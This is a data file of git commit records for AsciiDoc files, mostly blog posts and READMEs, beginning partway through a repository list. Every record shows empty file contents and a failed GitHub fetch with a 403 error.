nnouncements,gscheibel\/blog,loetjoe\/blog,anthonny\/personal-blog,paolo215\/blog,PerthHackers\/blog,abesn\/hubpress.io,akhmetgali\/hubpress.io,vuthaihoc\/vuthaihoc.github.io,philippevidal80\/blog,hiun\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,msavy\/rhymewithgravy.co
m,brieb\/hubpress.io,alexknowshtml\/thebigmove,pej\/hubpress.io,JohanBrunet\/hubpress.io,ncomet\/asciiblog,yangsheng1107\/hubpress.io,woehrl01\/woehrl01.hubpress.io,cherurg\/hubpress.io,jsiu22\/blog,melix\/hubpress,rorohiko21\/blog,DavidTPate\/davidtpate.com,redrabbit-calligraphy\/redrabbit-calligraphy-blog,jsiu22\/blog,simonturesson\/hubpresstestsimon,melix\/hubpress,rorosaurus\/hubpress.io,igovsol\/blog,jlcurty\/jlcurty.github.io-,imukulsharma\/imukulsharma.github.io,Evolution2626\/blog,loetjoe\/blog,puff-tw\/hubpress.io,koter84\/blog,cherurg\/hubpress.io,mathieu-pousse\/hubpress.io,ambarishpande\/blog,juhuntenburg\/gsoc2017,benignbala\/hubpress.io,DaOesten\/hubpress.io,ml4den\/hubpress,metadevfoundation\/metadevfoundation.github.io,redrabbit-calligraphy\/redrabbit-calligraphy-blog,Lukas238\/the-holodeck,mrfgl\/blog,jjmean2\/server-study,OdieD8\/hubpress.io,igovsol\/blog,fwalloe\/infosecbriefly,mufarooqq\/blog,matthardwick\/hubpress.io,abhayghatpande\/hubpress.io,ditirambo\/ditirambo.es,hiun\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,crotel\/meditation,liyucun\/blog,crotel\/studio,gscheibel\/blog,yaks-all-the-way-down\/hubpress.github.io,mcornell\/OFM,mairandomness\/randomblog,mrfgl\/blog,miroque\/shirokuma,AnassKartit\/anasskartit.github.io,arseniuss\/blog.arseniuss.id.lv,willcrisis\/www.willcrisis.com,Perthmastersswimming\/hubpress.io,atomfrede\/shiny-adventure,mkent-at-rivermeadow-dot-com\/hubpress.io,Abdul2\/abdul2.github.io,arabindamoni\/hubpress.io,natsu90\/hubpress.io,TeksInHelsinki\/en,Nepal-Blockchain\/danphe-blogs,jlmcgehee21\/nooganeer,mufarooqq\/blog,flug\/flug.github.io,dmacstack\/glob,vuthaihoc\/vuthaihoc.github.io,Bloggerschmidt\/bloggerschmidt.de,DavidTPate\/davidtpate.com,hanwencheng\/Undepth,gbougeard\/blog.english,jmnarloch\/blog.io,tmdgus0118\/blog.code404.co.kr,lawrencetaylor\/hubpress.io,jbutz\/hubpress-test,ashalkhakov\/hubpress.io,ErJ101\/hbspractise,berryzed\/tech-blog,Adyrhan\/adyrhan.github.io,pdudits\/hubpress,setupminimal\/blog,nandansaha\/AroundTheWeb,pdudits\/pdudits.github.io,brieb\/hubpress.io,sebprev\/blog,akhmetgali\/hubpress.io,sharmivssharmi\/sharmipress,kornel661\/blog-test-jm,porolakka\/hubpress.io,BenBals\/hubpress,mcrotty\/hubpress.io,gogonkt\/makenothing,SockPastaRock\/hubpress.io,SnorlaxH\/blog.urusa.me,fbridault\/sandblog,iKnowMagic\/hubpress.io,pepite\/hubpress.io,crotel\/meditation,flug\/flug.github.io,isaacriquelme\/endata.do,ambarishpande\/blog,ottoandry\/ottoandry1,mcrotty\/hubpress.io,dawn-chiniquy\/clear-project.org,AnassKartit\/anasskartit.github.io,brendena\/hubpress.io,ReadyP1\/hubpress.io,artavels\/pages,BenBals\/hubpress,DaOesten\/hubpress.io,ruaqiwei23\/blog,melix\/hubpress,SnorlaxH\/blog.urusa.me,btsibr\/myhubpress,yangsheng1107\/hubpress.io,rorohiko21\/blog,setupminimal\/blog,rjhbrunt\/hubpress.io,mrtrombley\/blog,abesn\/hubpress.io,woehrl01\/woehrl01.hubpress.io,jerometambo\/blog,gbougeard\/blog.english,DaOesten\/hubpress.io,pepite\/hubpress.io,nthline\/hubpress.io,qingyuqy\/qingyuqy.io,erramuzpe\/gsoc2016,celsogg\/blog,setupminimal\/blog","old_file":"README-zh.adoc","new_file":"README-zh.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ab7638c4f4a515b3116f9594683caa1a94f7b6b","subject":"Update 2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","message":"Update 
2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_file":"_posts\/2016-12-22-W-I-L-L-G-A-T-E-H-A-C-K-E-R-S-G-A-T-E.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85e9753b9ac809b9ef40d9f6da7e9fcccc6b382b","subject":"Update 2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","message":"Update 2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","new_file":"_posts\/2017-11-20-AA-Idiots-Guide-for-Explaining-Things.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a1028cc68926abcc3e59c4e76aae92b55c77b04a","subject":"Create les_principes.adoc","message":"Create les_principes.adoc","repos":"reyman\/mageo-documentation,reyman\/mageo-documentation,reyman\/mageo-documentation","old_file":"les_principes.adoc","new_file":"les_principes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/reyman\/mageo-documentation.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"6605698072c05e460219d74392269cf3138964a7","subject":"added abstracts for the developer workshop sessions","message":"added abstracts for the developer workshop sessions\n","repos":"couchbaselabs\/Workshop,couchbaselabs\/Workshop,couchbaselabs\/Workshop","old_file":"connect2016\/developer\/README.adoc","new_file":"connect2016\/developer\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/Workshop.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d3e0d49b1fb880fd0499e1e229f322ec69970945","subject":"y2b create post Make Wired Headphones Wireless!","message":"y2b create post Make Wired Headphones Wireless!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-01-17-Make-Wired-Headphones-Wireless.adoc","new_file":"_posts\/2016-01-17-Make-Wired-Headphones-Wireless.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b798bd8a7908dd89ddbc7211096e124fdab8cea","subject":"Update 2017-02-07-Managing-docker-compose-Part-1.adoc","message":"Update 
2017-02-07-Managing-docker-compose-Part-1.adoc","repos":"MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io,MartinAhrer\/martinahrer.github.io","old_file":"_posts\/2017-02-07-Managing-docker-compose-Part-1.adoc","new_file":"_posts\/2017-02-07-Managing-docker-compose-Part-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MartinAhrer\/martinahrer.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e03bf328c7361f1f702914dec6be1ecc94296018","subject":"Deleted _posts\/2016-10-27-Test.adoc","message":"Deleted _posts\/2016-10-27-Test.adoc","repos":"ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog,ruaqiwei23\/blog","old_file":"_posts\/2016-10-27-Test.adoc","new_file":"_posts\/2016-10-27-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ruaqiwei23\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6ca368d004c565f4ce36cc6fa5051d73178776","subject":"Update 2017-11-18-Oyku.adoc","message":"Update 2017-11-18-Oyku.adoc","repos":"Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io,Aferide\/Aferide.github.io","old_file":"_posts\/2017-11-18-Oyku.adoc","new_file":"_posts\/2017-11-18-Oyku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Aferide\/Aferide.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aed250186b2b0d3462081fe569c7abf22c4f5d15","subject":"Added Camel 2.19.4 release notes to docs","message":"Added Camel 2.19.4 release notes to 
docs\n","repos":"onders86\/camel,ullgren\/camel,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,onders86\/camel,pmoerenhout\/camel,onders86\/camel,apache\/camel,apache\/camel,nicolaferraro\/camel,apache\/camel,ullgren\/camel,punkhorn\/camel-upstream,davidkarlsen\/camel,adessaigne\/camel,davidkarlsen\/camel,kevinearls\/camel,mcollovati\/camel,cunningt\/camel,zregvart\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,cunningt\/camel,nicolaferraro\/camel,pmoerenhout\/camel,sverkera\/camel,punkhorn\/camel-upstream,tdiesler\/camel,alvinkwekel\/camel,jamesnetherton\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,DariusX\/camel,tadayosi\/camel,pax95\/camel,kevinearls\/camel,gnodet\/camel,christophd\/camel,christophd\/camel,objectiser\/camel,onders86\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,onders86\/camel,Fabryprog\/camel,mcollovati\/camel,CodeSmell\/camel,zregvart\/camel,cunningt\/camel,kevinearls\/camel,jamesnetherton\/camel,CodeSmell\/camel,sverkera\/camel,nikhilvibhav\/camel,kevinearls\/camel,jamesnetherton\/camel,onders86\/camel,davidkarlsen\/camel,punkhorn\/camel-upstream,pax95\/camel,alvinkwekel\/camel,anoordover\/camel,Fabryprog\/camel,tadayosi\/camel,pax95\/camel,christophd\/camel,punkhorn\/camel-upstream,adessaigne\/camel,nicolaferraro\/camel,nikhilvibhav\/camel,tadayosi\/camel,mcollovati\/camel,alvinkwekel\/camel,DariusX\/camel,CodeSmell\/camel,DariusX\/camel,mcollovati\/camel,Fabryprog\/camel,apache\/camel,adessaigne\/camel,CodeSmell\/camel,gnodet\/camel,christophd\/camel,gnodet\/camel,pax95\/camel,objectiser\/camel,jamesnetherton\/camel,zregvart\/camel,pax95\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,ullgren\/camel,christophd\/camel,tdiesler\/camel,adessaigne\/camel,sverkera\/camel,pmoerenhout\/camel,apache\/camel,gnodet\/camel,sverkera\/camel,DariusX\/camel,anoordover\/camel,Fabryprog\/camel,jamesnetherton\/camel,tdiesler\/camel,anoordover\/camel,ullgren\/camel,apache\/camel,kevinearls\/camel,kevinearls\/camel,anoordover\/camel,tdiesler\/camel,davidkarlsen\/camel,tdiesler\/camel,cunningt\/camel,gnodet\/camel,zregvart\/camel,alvinkwekel\/camel,anoordover\/camel,objectiser\/camel,sverkera\/camel,jamesnetherton\/camel,cunningt\/camel,nikhilvibhav\/camel,pmoerenhout\/camel,pax95\/camel","old_file":"docs\/user-manual\/en\/release-notes\/camel-2194-release.adoc","new_file":"docs\/user-manual\/en\/release-notes\/camel-2194-release.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"d16f1a45d1ea841df030cb3def441b435548d797","subject":"Update 2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","message":"Update 2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","new_file":"_posts\/2016-03-09-Joy-and-Sadness-to-meet-in-expanded-Epcot-Character-Spot-next-month.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d8ac4181ff2cd9bb7c1d37dd2ee95c1b4eb1f7d6","subject":"Update 
2015-06-24-Mon-premier-talk.adoc","message":"Update 2015-06-24-Mon-premier-talk.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-06-24-Mon-premier-talk.adoc","new_file":"_posts\/2015-06-24-Mon-premier-talk.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"574e88e3ef415701041a31f4923ff0c5eccbfb8b","subject":"Update 2015-11-05-Google-Big-Table.adoc","message":"Update 2015-11-05-Google-Big-Table.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-11-05-Google-Big-Table.adoc","new_file":"_posts\/2015-11-05-Google-Big-Table.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c598742f997a4416d858cef5bf9b722c313cfb5","subject":"Update 2017-02-24-Google-Extension.adoc","message":"Update 2017-02-24-Google-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Google-Extension.adoc","new_file":"_posts\/2017-02-24-Google-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39fe25caa1ae5a391cd826a35007fadbd3cf2b5b","subject":"Announcement of 0.9.3 release","message":"Announcement of 0.9.3 release\n","repos":"debezium\/debezium.github.io,debezium\/debezium.github.io,debezium\/debezium.github.io","old_file":"blog\/2019-03-26-debezium-0-9-3-final-released.adoc","new_file":"blog\/2019-03-26-debezium-0-9-3-final-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/debezium\/debezium.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"cf12147e35d3198e24dc1c1d5875ddbfdfd809ff","subject":"move section on identifiers","message":"move section on identifiers\n","repos":"jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io,jsanda\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_file":"src\/main\/jbake\/content\/docs\/components\/metrics\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jsanda\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"28fea4ee52325e72557d94dc5a0c55a5e9e1394c","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7d34ca334f1c698aa7d824723c00d3dbfe129207","subject":"Update 2016-03-22-Paris-terrorists-hid.adoc","message":"Update 2016-03-22-Paris-terrorists-hid.adoc","repos":"fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly,fwalloe\/infosecbriefly","old_file":"_posts\/2016-03-22-Paris-terrorists-hid.adoc","new_file":"_posts\/2016-03-22-Paris-terrorists-hid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fwalloe\/infosecbriefly.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b82b6ed10ac15f043ec24e59dbdc5069c85dc36","subject":"Update 2016-12-14-Um-mundo-holografico.adoc","message":"Update 2016-12-14-Um-mundo-holografico.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-Um-mundo-holografico.adoc","new_file":"_posts\/2016-12-14-Um-mundo-holografico.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"218a915330d370ce3d567a3a8397e87d8a76df30","subject":"Fixed typo","message":"Fixed typo\n","repos":"LFUnion\/left,LFUnion\/left,LFUnion\/left,LFUnion\/left","old_file":"compiler\/README.asciidoc","new_file":"compiler\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LFUnion\/left.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cef96b66483cc5190bfeee929d66c27a017ca727","subject":"Added documentation on customizing\/configuring the scheduler","message":"Added documentation on customizing\/configuring the scheduler\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/scheduler.adoc","new_file":"using_openshift\/scheduler.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3b5957578fb8237f502efbb3965607e76f9ab866","subject":"Added preliminary i18n support file (PR #1743)","message":"Added preliminary i18n support file (PR #1743)\n\n* First addition to temporary i18n support strings (Italian complete)\r\n","repos":"asciidocfx\/asciidoctor,asciidocfx\/asciidoctor","old_file":"data\/locale\/attributes.adoc","new_file":"data\/locale\/attributes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/asciidocfx\/asciidoctor.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"84a7c89f80c0d08f72dccf5c5a37dc24a572917f","subject":"Update 2016-05-17-docker-clouster-with-rancher.adoc","message":"Update 2016-05-17-docker-clouster-with-rancher.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_file":"_posts\/2016-05-17-docker-clouster-with-rancher.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa98d1f76e36b8636fca356d14d42f1eac156952","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94c177f3b1d209677f0208f78681d6baeca9c728","subject":"Update 2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","message":"Update 2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","repos":"metasean\/blog,metasean\/blog,metasean\/blog,metasean\/hubpress.io,metasean\/blog,metasean\/hubpress.io,metasean\/hubpress.io","old_file":"_posts\/2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","new_file":"_posts\/2016-04-11-Wielding-your-newly-built-T-D-D-Wand.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/metasean\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2b363b5432754064419855ece87403c239ff1ed3","subject":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","message":"Update 2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_file":"_posts\/2016-09-30-Testing-chef-cookbooks-the-dirty-way.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e6bf00ebeecfaa6a8830b124e4f5b5e4423228d4","subject":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","message":"Update 2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_file":"_posts\/2017-02-20-Testing-DNS-Infrastructure-with-Goss.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1c6726dabf4bc6385110eb198312d1e08bde301","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL 
returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f4ad53e743048acc293962924e0a9b3913a4b55","subject":"Create how_to_build.adoc","message":"Create how_to_build.adoc","repos":"restSampleServices\/node-service,restSampleServices\/node-service,restSampleServices\/node-service","old_file":"doc\/how_to_build.adoc","new_file":"doc\/how_to_build.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/restSampleServices\/node-service.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0195218038f631ed77871eb0d8889ecee25b983e","subject":"Update 2017-02-14-Nest-Devices.adoc","message":"Update 2017-02-14-Nest-Devices.adoc","repos":"datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io,datumrich\/datumrich.github.io","old_file":"_posts\/2017-02-14-Nest-Devices.adoc","new_file":"_posts\/2017-02-14-Nest-Devices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/datumrich\/datumrich.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4af011fed0b96b1feb0682f6658a5747eb3de238","subject":"y2b create post iPhone 5s \\\/ 5c Launch Line at Apple Store!","message":"y2b create post iPhone 5s \\\/ 5c Launch Line at Apple Store!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-09-20-iPhone-5s--5c-Launch-Line-at-Apple-Store.adoc","new_file":"_posts\/2013-09-20-iPhone-5s--5c-Launch-Line-at-Apple-Store.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ae029238f8dcecc293939f60e9266380e689898","subject":"Update 2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","message":"Update 2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","new_file":"_posts\/2016-09-06-Episode-71-Things-That-Make-You-Go-Hummm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c350cc2231721c7587bcee00baf4ee03c3d37a18","subject":"Updates forum link","message":"Updates forum link\n","repos":"bartoszmajsak\/arquillian-core,MatousJobanek\/arquillian-core,MatousJobanek\/arquillian-core,rhusar\/arquillian-core,rhusar\/arquillian-core,arquillian\/arquillian-core,bartoszmajsak\/arquillian-core","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rhusar\/arquillian-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"92c015f885a8c1e8e04dd039e04d568427b7d0f6","subject":"Updated README credit URL","message":"Updated README credit URL\n\nNecessary to pick up new author profile 
URL.\n","repos":"bkuhlmann\/ruby_setup,bkuhlmann\/ruby_setup","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bkuhlmann\/ruby_setup.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a5ce4f5e3dfb69a0d2b8245da87fcca30678e22d","subject":"Add archive text to README.adoc","message":"Add archive text to README.adoc\n","repos":"spring-projects\/aws-ant","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/aws-ant.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b24e72f6b7196c46c49d5bad9d1a3ddba6e7b260","subject":"updated README","message":"updated README\n","repos":"docToolchain\/docToolchain,docToolchain\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain,jakubjab\/docToolchain,carloslozano\/docToolchain,docToolchain\/docToolchain,carloslozano\/docToolchain","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/docToolchain\/docToolchain.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37c114a177cddfab7656da39e610ed8c101ba909","subject":"y2b create post This Gadget Scans Color From Anything!","message":"y2b create post This Gadget Scans Color From Anything!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-09-28-This-Gadget-Scans-Color-From-Anything.adoc","new_file":"_posts\/2016-09-28-This-Gadget-Scans-Color-From-Anything.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dc3b193efb4b82fdec681f0c625075b67e561cf3","subject":"Update 2016-07-18-New-Blog.adoc","message":"Update 2016-07-18-New-Blog.adoc","repos":"laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io,laura-arreola\/laura-arreola.github.io","old_file":"_posts\/2016-07-18-New-Blog.adoc","new_file":"_posts\/2016-07-18-New-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/laura-arreola\/laura-arreola.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 